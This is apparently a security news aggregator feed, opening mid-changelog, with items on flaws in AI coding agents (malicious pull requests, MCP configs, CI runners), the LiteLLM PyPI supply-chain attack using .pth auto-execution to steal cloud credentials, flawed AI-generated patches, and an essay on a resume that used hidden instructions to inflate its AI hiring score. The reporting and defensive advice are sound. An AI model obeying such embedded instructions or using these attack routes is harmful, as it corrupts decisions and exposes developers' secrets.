<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kimprap/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kimprap">@kimprap</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5079409325" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7816" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7816/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7816">#7816</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IceCodeNew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IceCodeNew">@IceCodeNew</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5080699687" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7828" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7828/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7828">#7828</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vinhnguyen1211/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vinhnguyen1211">@vinhnguyen1211</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5081464111" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7832" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7832/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7832">#7832</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CaelumSea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CaelumSea">@CaelumSea</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5086119373" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7867" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7867/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7867">#7867</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voonfoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voonfoo">@voonfoo</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5087855708" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7892" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7892/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7892">#7892</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zerx-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zerx-lab">@zerx-lab</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5088557956" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7896" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7896/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7896">#7896</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcastillo18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcastillo18">@fcastillo18</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5075625420" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7759" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7759/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7759">#7759</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ParadaCarleton/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ParadaCarleton">@ParadaCarleton</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5076884476" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7782" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7782/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7782">#7782</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v17.2.10...v17.2.11">v17.2.10...v17.2.11</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Flaws in Claude Code, Gemini CLI, and OpenAI Codex Enable RCE and Supply Chain Attacks]]></title>
<description><![CDATA[Security researchers have disclosed a vulnerability affecting AI coding-agent workflows from Anthropic, Google, and OpenAI. Their research highlights how an attacker-controlled issue or zero-privilege input can breach trust boundaries in an agent “harness”, which includes the permissions, tools, ...]]></description>
<link>https://tsecurity.de/de/3710522/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710522/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:36:43 +0200</pubDate>
<content:encoded><![CDATA[<p>Security researchers have disclosed a vulnerability affecting AI coding-agent workflows from Anthropic, Google, and OpenAI. Their research highlights how an attacker-controlled issue or zero-privilege input can breach trust boundaries in an agent “harness”, which includes the permissions, tools, sandbox, filesystem, and automation surrounding the model, and result in code execution, secret theft, or workflow compromise. […]</p>
<p>The post <a href="https://gbhackers.com/critical-flaws-in-claude-code-gemini-cli-and-openai-codex/">Critical Flaws in Claude Code, Gemini CLI, and OpenAI Codex Enable RCE and Supply Chain Attacks</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Living off the coding agent: Two tales of tunnels and LaunchAgents]]></title>
<description><![CDATA[Agent-parented reverse tunnels and LaunchAgents can expose a local admin app to the internet. Endpoint still needs to treat that as high severity even when the activity looks like vibe-coded ops, not confirmed malware.]]></description>
<link>https://tsecurity.de/de/3710476/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710476/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:35:53 +0200</pubDate>
<content:encoded><![CDATA[Agent-parented reverse tunnels and LaunchAgents can expose a local admin app to the internet. Endpoint still needs to treat that as high severity even when the activity looks like vibe-coded ops, not confirmed malware.]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Flaws in Claude Code, Gemini CLI, and OpenAI Codex Enable RCE and Supply Chain Attacks]]></title>
<description><![CDATA[Security researchers have disclosed a vulnerability affecting AI coding-agent workflows from Anthropic, Google, and OpenAI. Their research highlights how an attacker-controlled issue or zero-privilege input can breach trust boundaries in an agent “harness”, which includes the permissions, tools, ...]]></description>
<link>https://tsecurity.de/de/3710456/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710456/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:35:25 +0200</pubDate>
<content:encoded><![CDATA[<p>Security researchers have disclosed a vulnerability affecting AI coding-agent workflows from Anthropic, Google, and OpenAI. Their research highlights how an attacker-controlled issue or zero-privilege input can breach trust boundaries in an agent “harness”, which includes the permissions, tools, sandbox, filesystem, and automation surrounding the model, and result in code execution, secret theft, or workflow compromise. […]</p>
<p>The post <a href="https://gbhackers.com/critical-flaws-in-claude-code-gemini-cli-and-openai-codex/">Critical Flaws in Claude Code, Gemini CLI, and OpenAI Codex Enable RCE and Supply Chain Attacks</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Python package security in 2026: How supply chain attacks are targeting your AI development environment]]></title>
<description><![CDATA[On March 24, 2026, developers building AI applications with LiteLLM — a Python package with 95 million monthly downloads — unknowingly installed malicious code. A threat actor group known as TeamPCP had compromised the PyPI distribution pipeline and pushed malicious versions 1.82.7 and 1.82.8 to ...]]></description>
<link>https://tsecurity.de/de/3710444/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710444/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:35:24 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">On March 24, 2026, developers building AI applications with <a href="https://www.litellm.ai/" target="_blank" rel="noreferrer noopener">LiteLLM</a> — a Python package with 95 million monthly downloads — unknowingly installed malicious code. A threat actor group known as TeamPCP had compromised the PyPI distribution pipeline and pushed malicious versions 1.82.7 and 1.82.8 to the package index. The payload was subtle: a .pth file, a little-known Python mechanism that auto-executes code every time the interpreter starts. If you installed either compromised version, malicious code ran silently — no explicit import needed.</p>



<p class="wp-block-paragraph">That is not the exception anymore. It is the pattern.</p>



<h2 class="wp-block-heading">What is actually happening</h2>



<p class="wp-block-paragraph"><a href="https://www.reversinglabs.com/blog/software-supply-chain-security-report" target="_blank" rel="noreferrer noopener">ReversingLabs reports</a> that malicious open-source packages rose by 73% in 2026. The LiteLLM attack was part of a broader campaign by TeamPCP that systematically compromised widely trusted open-source security tools — including Aqua Security’s Trivy and Checkmarx’s KICS — before moving into AI infrastructure libraries hosted on PyPI.</p>



<p class="wp-block-paragraph">The attack chain for LiteLLM followed a now-familiar sequence. TeamPCP obtained the maintainer’s PyPI publishing credentials, pushed malicious versions that were virtually indistinguishable from the official package, and embedded a multi-stage payload designed to harvest high-value secrets: AWS, GCP and Azure tokens, SSH keys and cloud account credentials. <a href="https://www.zscaler.com/blogs/security-research/supply-chain-attacks-surge-march-2026" target="_blank" rel="noreferrer noopener">According to Zscaler ThreatLabz</a>, the poisoned packages were available for approximately three hours before quarantine. Three hours was enough to reach tens of thousands of corporate environments.</p>



<p class="wp-block-paragraph">And it did not stop with LiteLLM. In late April 2026, PyTorch Lightning versions 2.6.2 and 2.6.3 were found to contain credential-stealing malware that executed on import. A single malicious workflow file exposed secrets across entire CI/CD pipelines.</p>



<h2 class="wp-block-heading">Why AI development environments are uniquely exposed</h2>



<p class="wp-block-paragraph">Most supply chain attacks are bad. Supply chain attacks targeting AI development environments are worse.</p>



<p class="wp-block-paragraph">AI and ML environments blend development, research, cloud infrastructure, data access, model publishing and automation inside the same workspace. A compromised Python package in a standard web application might steal a database credential. The same attack in an AI development environment can expose model weights, training data, cloud tokens across multiple providers, CI/CD pipeline secrets and production API keys — simultaneously, from a single infected dependency.</p>



<p class="wp-block-paragraph">There is a second layer that most security teams are not accounting for. When developers use AI coding assistants to write code, those assistants frequently suggest pip install directives and import statements that reference specific packages. If the developer trusts the suggestion and installs the named package, and an attacker has already registered a malicious package under that name, the attack succeeds without the attacker ever interacting with the developer directly. Researchers have named this slopsquatting — and <a href="https://arxiv.org/pdf/2605.17062" target="_blank" rel="noreferrer noopener">recent research</a> found that across nearly 200,000 Python prompts, every major LLM generates hallucinated package names that do not exist on PyPI, creating a persistent attack surface that no individual model update can fully address.</p>



<p class="wp-block-paragraph">Your developers are not doing anything wrong. They are using the tools that make them productive. The security assumption underneath those tools is broken.</p>



<h2 class="wp-block-heading">3 controls that matter right now</h2>



<h3 class="wp-block-heading">1. Pin your dependencies and verify integrity</h3>



<p class="wp-block-paragraph">Floating version specifiers — requests&gt;=2.0 rather than requests==2.31.0 — allow package managers to silently pull updates that include malicious code. Pin every dependency in your AI development environments to an exact version and verify checksums against a known-good hash. This alone would have limited the blast radius of the LiteLLM attack to environments that explicitly upgraded to the compromised versions rather than any environment that ran pip install litellm without constraints.</p>



<h3 class="wp-block-heading">2. Audit post-install hooks in your development pipeline</h3>



<p class="wp-block-paragraph">The LiteLLM attack embedded its payload using Python’s .pth file mechanism — code that executes automatically during interpreter initialization, before any import statement runs. Post-install hooks and .pth file manipulation are a documented attack class, but enforcement in developer environments is inconsistent. Require review of packages that include post-install scripts before they reach developer machines. Tools like Socket and Sonatype provide real-time analysis of PyPI packages for malicious behavior before installation. This is not a nice-to-have. Given the pace of AI tooling adoption, it is a basic control.</p>



<h3 class="wp-block-heading">3. Rotate cloud credentials immediately after any suspected exposure</h3>



<p class="wp-block-paragraph">The LiteLLM payload targeted AWS, GCP and Azure tokens specifically because those credentials provide lateral movement across cloud environments. If your development pipelines pulled LiteLLM during the March 24 exposure window, treat every cloud credential accessible from those environments as potentially compromised and rotate them. Review your cloud provider audit logs for activity patterns that do not correspond to developer-initiated requests — the signature of a stolen token being used by an attacker in a different location.</p>



<h2 class="wp-block-heading">What this means for security teams</h2>



<p class="wp-block-paragraph">The TeamPCP campaign is not the end of this pattern. It is a proof of concept that AI infrastructure is now a target class. LiteLLM, PyTorch Lightning and the tools in between are packages your AI teams depend on every day. The attackers know that. They know that developers move fast, that AI tooling adoption outpaces security review cycles and that a malicious .pth file is invisible to most endpoint detection products.</p>



<p class="wp-block-paragraph">The controls above are not complex. They do not require new vendors or new platforms. They require treating Python package installation in AI development environments with the same rigor you apply to production deployments — because in 2026, the distance between a developer’s local environment and your production infrastructure is shorter than it has ever been, and attackers have noticed.</p>



<p class="wp-block-paragraph">Your developers trust their tools. Make sure that trust is warranted.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Human oversight is still critical as AI patching tools miss security risks]]></title>
<description><![CDATA[AI-generated vulnerability patches still heavily depend on human review, particularly the ones involving security-sensitive code, according to a research.



Researchers from 1Password have disclosed an internal evaluation that found AI-generated fixes frequently overlook broader concerns such as...]]></description>
<link>https://tsecurity.de/de/3710445/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710445/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:35:24 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI-generated vulnerability patches still heavily depend on human review, particularly the ones involving security-sensitive code, according to a research.</p>



<p class="wp-block-paragraph">Researchers from 1Password have disclosed an internal evaluation that found AI-generated fixes frequently overlook broader <a href="https://www.csoonline.com/article/4202381/risk-based-patching-is-the-future-ai-made-it-table-stakes.html" target="_blank">concerns</a> such as architectural intent, business requirements, security implications, and long-term maintainability, despite being syntactically correct.</p>



<p class="wp-block-paragraph">“We studied what happens when Large Language Models (LLMs) generate vulnerability patches for recently disclosed, complex vulnerabilities,” said 1Password researcher <a href="https://www.linkedin.com/in/securingdev/" target="_blank" rel="noreferrer noopener">Keith Hoodlet</a> in a blog <a href="https://1password.com/blog/why-ai-generated-patches-still-require-human-review" target="_blank" rel="noreferrer noopener">post</a>. “Our data shows that LLMs produce Fix-Like Artifacts with Embedded Defects (FLAWED) 53.9% of the time when complex patches are required.”</p>



<p class="wp-block-paragraph">The evaluation tested the AI-generated fixes across six recently disclosed CVEs, including CVE-2026-31431 (“<a href="https://www.csoonline.com/article/4169399/new-dirty-frag-exploit-targets-linux-kernel-for-root-access.html">Copy Fail</a>”), CVE-2026-34197 (<a href="https://www.csoonline.com/article/4157146/claude-uncovers-a-13%E2%80%91year%E2%80%91old-activemq-rce-bug-within-minutes.html">ActiveMQ RCE</a>), CVE-2026-8512, CVE-2026-45185 (EXIM RCE), CVE-2026-22738 (<a href="https://nvd.nist.gov/vuln/detail/cve-2026-22738">SpringAI SpEL RCE</a>), and the <a href="https://www.csoonline.com/article/4165470/max-severity-rce-flaw-found-in-google-gemini-cli.html">Gemini CLI RCE</a> (GHSA-wpqr-6v78-jr5g).</p>



<p class="wp-block-paragraph">1Password reportedly evaluated 6080 patches generated using ChatGPT-5.5 and Claude Opus 4.8, two frontier AI coding models, and found that only a little over a quarter of the fixes fully remediated the flaw without altering application behavior.</p>



<p class="wp-block-paragraph">“Patches that successfully resolved the vulnerability, but altered the application’s behavior in the process, occurred 20.1% of the time,” Hoodlet added.</p>



<h2 class="wp-block-heading"><a></a>Fixing is not the same as securing</h2>



<p class="wp-block-paragraph">Instead of simply checking whether the fixed code compiled or passed automated tests, 1Password said it reviewed every generated fix for complete elimination of the vulnerability, preservation of application behavior, and avoidance of new security risks.</p>



<p class="wp-block-paragraph">While only 26% of the patches successfully fixed the vulnerability without introducing application changes, 49.3% failed to remove at least one exploitable attack path, 2.3% fixed the original vulnerability but introduced a new one, and 2.2% both failed to remediate the issue and created an additional security weakness.</p>



<p class="wp-block-paragraph">The researchers also found that passing pre-defined tests can create deeper problems. More than one-third of the patches that initially appeared successful were classified as “fragile” because they simply blocked the proof-of-concept (POC) exploit used during testing instead of addressing the underlying root cause.</p>



<p class="wp-block-paragraph">Hoodlet explained this with the example of the SpringAI CVE patches. Both GPT and Claude models were found generating patches that targeted specific characters from the input string used in the POC presented to them, leaving the root cause untouched.</p>



<p class="wp-block-paragraph">“If the guarded code were to become reachable again by using alternative inputs, it would lead to the old vulnerability resurfacing in the software,” he noted.</p>



<h2 class="wp-block-heading"><a></a>Human review remains the last security control</h2>



<p class="wp-block-paragraph">1Password argues that these shortcomings stem from the contextual reasoning required to produce production-ready security fixes.</p>



<p class="wp-block-paragraph">Anthropic was reached out to and reportedly recommended keeping humans in the loop. “Patch generation has outpaced patch verification, and the fix is to make verification execution-grounded rather than inspection-based, while keeping domain experts as the final reviewers at current model capabilities,” it was quoted as saying.</p>



<p class="wp-block-paragraph">1Password also challenged the notion that AI-generated patches are effectively “free.” While the average patch-and-validation cycle cost approximately $2.11 using ChatGPT-5.5 and $2.81 using Claude Opus 4.8, Hoodlet argued that the real expense lies in validating whether those patches are secure enough for production.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Code RCE Flaw Lets Malicious Pull Requests Execute Commands Without Approval]]></title>
<description><![CDATA[A newly disclosed security issue in Anthropic’s Claude Code could allow a malicious pull request to execute attacker-controlled commands on a developer’s workstation simply by opening the AI coding assistant inside a previously trusted repository. The issue stems from how project-scoped Model Con...]]></description>
<link>https://tsecurity.de/de/3710430/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710430/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:35:21 +0200</pubDate>
<content:encoded><![CDATA[<p>A newly disclosed security issue in Anthropic’s Claude Code could allow a malicious pull request to execute attacker-controlled commands on a developer’s workstation simply by opening the AI coding assistant inside a previously trusted repository. The issue stems from how project-scoped Model Context Protocol (MCP) configurations are loaded after a repository or workspace has been […]</p>
<p>The post <a href="https://cyberpress.org/claude-code-rce-flaw-pull-requests-execute-commands/">Claude Code RCE Flaw Lets Malicious Pull Requests Execute Commands Without Approval</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Coding-Agents: Schwachstellen in Claude Code und Gemini CLI geben CI-Runner Zugriff]]></title>
<description><![CDATA[BLACK HAT USA / LONDON (IT BOLTWISE) – Eine Untersuchung zeigt, dass manipulierbare Eingaben in KI-Coding-Agents die CI-Workflows von Anthropic und Google so aushebeln können, dass Code auf Runnern außerhalb des Modells ausgeführt wird. Für Gemini CLI wird ein besonders gravierender Container-Lau...]]></description>
<link>https://tsecurity.de/de/3710419/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710419/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:35:19 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/08/ai-coding-agents-ci-runner-sandbox-breach-120x120.jpg 120w" sizes="auto, (max-width: 1024px) 100vw, 1024px">BLACK HAT USA / LONDON (IT BOLTWISE) – Eine Untersuchung zeigt, dass manipulierbare Eingaben in KI-Coding-Agents die CI-Workflows von Anthropic und Google so aushebeln können, dass Code auf Runnern außerhalb des Modells ausgeführt wird. Für Gemini CLI wird ein besonders gravierender Container-Launcher-Bug als CVE-2026-12537 mit CVSS 4 10.0 beschrieben, der über eine crafted.gemini/.env-Datei in Gang […]</p>
<div><a href="https://www.it-boltwise.de/ki-coding-agents-schwachstellen-in-claude-code-und-gemini-cli-geben-ci-runner-zugriff.html">... den vollständigen Artikel <strong>»KI-Coding-Agents: Schwachstellen in Claude Code und Gemini CLI geben CI-Runner Zugriff«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ki-coding-agents-schwachstellen-in-claude-code-und-gemini-cli-geben-ci-runner-zugriff.html">KI-Coding-Agents: Schwachstellen in Claude Code und Gemini CLI geben CI-Runner Zugriff</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI hiring tool isn’t an HR problem. It’s a security one]]></title>
<description><![CDATA[For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candid...]]></description>
<link>https://tsecurity.de/de/3710292/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710292/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:04 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candidates, conducting interviews, ranking applicants and influencing who moves forward, the hiring platform stops being a passive system of record. It becomes a decision system.</p>



<p class="wp-block-paragraph">And any system that accepts public input, processes sensitive data and influences business decisions belongs inside the security conversation.</p>



<p class="wp-block-paragraph">I learned this during an AI hiring platform rollout that never made it to production. The vendor was established, the product had a strong market reputation and the AI feature looked attractive: Upload a resume, compare it to a job description and return a neat percentage match. For recruiters, it promised speed. For executives, it promised modernization.</p>



<p class="wp-block-paragraph">Before moving real candidate data into the system, I tested it with synthetic resumes. One weak resume came back with a surprisingly strong match. The reason was not hidden in the candidate’s experience. It was hidden in the text. The resume contained language instructing the AI to treat the candidate as an excellent fit, and the system appeared to follow that instruction instead of evaluating the resume on merit.</p>



<p class="wp-block-paragraph">That changed the question from “Does the tool improve productivity?” to “Can the person being evaluated influence the evaluation itself?”</p>



<p class="wp-block-paragraph">That is a security question.</p>



<h2 class="wp-block-heading">The trust boundary has moved</h2>



<p class="wp-block-paragraph">CIOs do not need to become recruiting experts. They only need to look at the mechanics.</p>



<p class="wp-block-paragraph">An anonymous user submits content into an enterprise system. That content is processed by software. The software then produces an output that can influence a business decision. In every other environment, security teams know what to call that: untrusted input crossing a trust boundary.</p>



<p class="wp-block-paragraph">The difference is that in hiring, the input looks harmless. It is a resume, a cover letter, a chatbot reply or a spoken answer in an AI-led interview. But once AI reads that content and treats it as instruction, the harmless-looking input becomes part of the system’s control surface.</p>



<p class="wp-block-paragraph">That is why prompt injection matters in hiring. It is not just an AI oddity or a model behavior issue. It is the same category of failure enterprises have spent decades trying to prevent: User-controlled input changing what the system does. <a href="https://genai.owasp.org/llmrisk/llm01-prompt-injection/">OWASP lists prompt injection as the first risk in its Top 10 for LLM applications</a>, describing it as a case where user prompts alter a model’s behavior or output in unintended ways.</p>



<p class="wp-block-paragraph">In hiring, the implication is direct: A candidate may be able to manipulate the score, ranking or interview assessment that determines whether a human ever sees them.</p>



<h2 class="wp-block-heading">The business impact is not theoretical</h2>



<p class="wp-block-paragraph">The obvious risk is that an unqualified candidate moves forward. But the impact is broader.</p>



<p class="wp-block-paragraph">First, decision quality degrades. Hiring teams adopt AI scoring because they believe it improves signal. If the score can be manipulated, the business is not gaining signal; it is gaining false confidence. Recruiters may spend time on candidates who gamed the system while stronger candidates are buried lower in the queue. A tool bought to reduce friction can quietly create more of it.</p>



<p class="wp-block-paragraph">Second, cost increases under the appearance of efficiency. Every false positive consumes recruiter time, hiring-manager attention, interview slots and opportunity cost. A small weakness in screening integrity can become a measurable operational drag across open roles.</p>



<p class="wp-block-paragraph">Third, trust suffers. Candidates already question whether AI hiring tools are fair, explainable or accurate. If it becomes clear that a screening system can be manipulated by hidden instructions or verbal prompting, the issue is no longer just security. It becomes reputational. Strong candidates may lose confidence in the process, and employers may have to defend decisions made by systems they did not fully understand.</p>



<p class="wp-block-paragraph">Fourth, sensitive data exposure becomes harder to contain. Recruiting systems hold names, addresses, work histories, education histories, compensation details, work authorization information and sometimes accommodation or demographic data. <a href="https://csrc.nist.gov/pubs/sp/800/122/final">NIST guidance on personally identifiable information</a> includes employment information as linkable personal data that must be protected from inappropriate access, use and disclosure. Yet hiring platforms often receive less security scrutiny than systems holding customer or financial data.</p>



<p class="wp-block-paragraph">That mismatch is dangerous: High-value data, public-facing workflows and increasing automation.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/4020919/mcdonalds-ai-hiring-tools-password-123456-exposes-data-of-64m-applicants.html">The 2025 McHire incident</a> should have made this impossible to ignore. Researchers reported that weaknesses in McDonald’s AI hiring platform, including default credentials and an access-control flaw, exposed applicant data at large scale before the issue was patched. The lesson for CIOs is not merely that a weak password was used. The lesson is that AI hiring systems can ship with basic, preventable security failures while still being treated as HR tools rather than enterprise risk surfaces.</p>



<h2 class="wp-block-heading">Vendor reputation does not transfer to every AI feature</h2>



<p class="wp-block-paragraph">One reason this risk slips through is that buyers often trust the platform brand. Mature vendors may have strong security programs, enterprise customers, compliance documentation and procurement-friendly answers.</p>



<p class="wp-block-paragraph">But AI features can change the architecture of risk.</p>



<p class="wp-block-paragraph">A platform that was safe as a workflow tool may behave very differently once it adds resume scoring, interview grading, chatbot screening or automated ranking. The new feature may introduce new inputs, new model behavior, new data flows, new third-party dependencies and new decision points. In practical terms, the attack surface has changed.</p>



<p class="wp-block-paragraph">CIOs should not allow AI features to inherit trust automatically from the legacy platform around them. When a vendor adds AI, the enterprise should reassess the feature as if it were a new product. That does not mean slowing innovation for bureaucracy. It means AI-enabled decision-making carries different failure modes from ordinary workflow automation.</p>



<h2 class="wp-block-heading">The ownership gap is the real vulnerability</h2>



<p class="wp-block-paragraph">The biggest risk may not be the model. It may be the ownership gap.</p>



<p class="wp-block-paragraph">Talent acquisition may buy the tool. HR operations may configure it. The vendor may guide implementation. Procurement and legal may approve the contract. But who owns the security of the candidate-facing AI layer?</p>



<p class="wp-block-paragraph">In many organizations, the honest answer is unclear.</p>



<p class="wp-block-paragraph">That ambiguity is where risk grows. Recruiting technology sits at the intersection of public input, sensitive data, third-party software, automated decision support and brand trust. That is exactly the kind of environment that needs named security ownership, asset inventory, vendor review, access-control testing, logging and incident-response planning.</p>



<p class="wp-block-paragraph">If the hiring stack is not in the security inventory, the organization is already making an assumption it may later regret.</p>



<h2 class="wp-block-heading">What CIOs should require now</h2>



<p class="wp-block-paragraph">The fix is not exotic. It is applying existing security discipline to a surface that has been underestimated.</p>



<p class="wp-block-paragraph">Treat every candidate submission as untrusted input. Resumes, cover letters, chatbot responses, interview transcripts and spoken answers should be handled as attacker-controllable content. If AI processes it, the system must separate content from instruction.</p>



<p class="wp-block-paragraph">Reassess vendors when AI features are introduced. A prior security review should not be treated as permanent approval for new AI capabilities. Ask what changed in the architecture, what data the model sees, what actions it can influence and how manipulation attempts are detected.</p>



<p class="wp-block-paragraph">Ask AI-specific questions before signing. Can candidate-provided content alter scoring? Are hidden instructions filtered or ignored? Is there human review before AI output influences a decision? Can the vendor produce testing evidence for prompt injection, access control and data exposure risks?</p>



<p class="wp-block-paragraph">Assign ownership. HR can own the process, but security must own the risk model. AI hiring systems should be included in third-party risk management, application security reviews, access governance, monitoring and incident response planning.</p>



<p class="wp-block-paragraph">Measure business impact, not just AI adoption. The goal is not to say the recruiting function uses AI. The goal is to improve hiring speed, quality, fairness and cost without creating new risk. If the system cannot protect decision integrity, the business case is weaker than it appears.</p>



<h2 class="wp-block-heading">The hiring platform is now part of the enterprise attack surface</h2>



<p class="wp-block-paragraph">AI has turned the careers page into more than a front door for applicants. It is now a public input channel feeding systems that store sensitive data and influence workforce decisions.</p>



<p class="wp-block-paragraph">That makes it a CIO concern.</p>



<p class="wp-block-paragraph">The next failure in AI hiring may not look like a traditional breach at first. It may look like bad rankings, manipulated scores, unexplainable decisions, wasted recruiter time or a candidate process no one trusts. But underneath those symptoms is a familiar security problem: A system trusted input it should have treated as hostile.</p>



<p class="wp-block-paragraph">Enterprises have hardened payment systems, customer portals, APIs and employee applications around that lesson. Hiring deserves the same treatment.</p>



